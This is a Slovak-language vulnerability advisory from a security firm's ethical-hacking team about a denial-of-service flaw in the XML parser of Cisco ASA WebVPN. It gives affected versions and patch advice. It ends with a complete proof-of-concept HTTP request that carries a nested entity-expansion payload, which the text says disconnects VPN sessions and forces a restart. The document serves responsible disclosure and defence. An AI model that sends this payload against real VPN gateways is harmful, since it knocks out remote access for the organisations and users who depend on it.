Cisco ASA VPN XML Parser Denial of Service Vulnerability
22.9.2015
Cisco ASA VPN XML Parser Denial of Service Vulnerability

Tím etických hackerov spoločnosti AEC objavil a reportoval závažnú zraniteľnosť v systémoch spoločnosti Cisco.

Závažnosť: vysoká
Obtiažnosť zneužitia: nízká

Identifikovaná zraniteľnosť je spôsobená chybou XML parseru softvérového komponentu WebVPN v produktoch Cisco ASA. Zneužiť túto zraniteľnosť je možné pomocou špeciálne vytvorenej súpravy XML entít odoslanej neautentizovane pomocou prostriedkov vzdialenej komunikácie. Úspešné zneužitie zraniteľnosti vedie k odpojeniu všetkých zostavených SSL VPN spojení, nestabilite systému a reštartu. Existuje reálne riziko dlhodobého pôsobenia útoku a tak i dlhšie trvajúceho znemožnenia využitia VPN postihnutej spoločnosti.

 

Zraniteľné systémy

Zariadenie Cisco ASA konfigurované pre Clientless alebo AnyConnect SSL VPN a AnyConnect IKEv2 VPN.

Zraniteľné sú tieto verzie softvéru:

  • Cisco ASA Software 8.4 před 8.4(7.28)
  • Cisco ASA Software 8.6 před 8.6(1.17)
  • Cisco ASA Software 9.0 před 9.0(4.32)
  • Cisco ASA Software 9.1 před 9.1(6)
  • Cisco ASA Software 9.2 před 9.2(3.4)
  • Cisco ASA Software 9.3 před 9.3(3)

Zraniteľnosť bola reportovaná spoločnosťou Cisco. K zverejneniu všetkých detailov sme s ohľadom na našich zákazníkov pristúpili až po dostatočne dlhej dobe zaisťujúcej zodpovedajúcu úroveň nápravných opatrení v nami chránených spoločnostiach.

 

Odporúčanie AEC

Mitigačné opatrenia na úrovni okolitých alebo predradených systémov nie sú efektívne. Ak používate riešenia staršej verzie, než je uvedené vyššie, kontaktujte dodávateľa systému a žiadejte patch.

Viac detailov je k dispozícii na týchto oficiálnych odkazoch spoločnosti Cisco:
http://tools.cisco.com/security/center/viewAlert.x?alertId=38185
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150408-asa

 

Proof of Concept

Nižšie uvádzame príklad požiadavky vedúcej k úspešnému zneužitiu zraniteľnosti a spôsobeniu stavu nedostupnosti služby. Pre zachovanie anonymity bola požiadavka modifikovaná.

http požiadavka:

POST / HTTP/1.1
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
X-Transcend-Version: 1
X-Aggregate-Auth: 1
X-AnyConnect-Platform: win
Host: VPN_SERVER_NAME
Cookie: sdesktop=4168B38548AE90FC768A2DEF;
User-Agent: AnyConnect Windows 3.1.05152
Content-Length: 907
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY xxx "test">
<!ENTITY xxx1 "&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;&xxx;">
<!ENTITY xxx2 "&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;&xxx1;">
<!ENTITY xxx3 "&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;&xxx2;">
<!ENTITY xxx4 "&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;&xxx3;">
<!ENTITY xxx5 "&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;&xxx4;">
<!ENTITY xxx6 "&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;&xxx5;">
<!ENTITY xxx7 "&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;&xxx6;">
<!ENTITY xxx8 "&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;&xxx7;">
<!ENTITY xxx9 "&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;&xxx8;">
]>

<config-auth client="vpn" type="auth-reply" aggregate-auth-version="2">
<test>&xxx9;</test>
</config-auth>

Po zaslaní požiadavky uvedenej vyššie na zraniteľnú službu dôjde ku stavu odopretia služby VPN a odpojenia existujúcich SSL VPN spojení.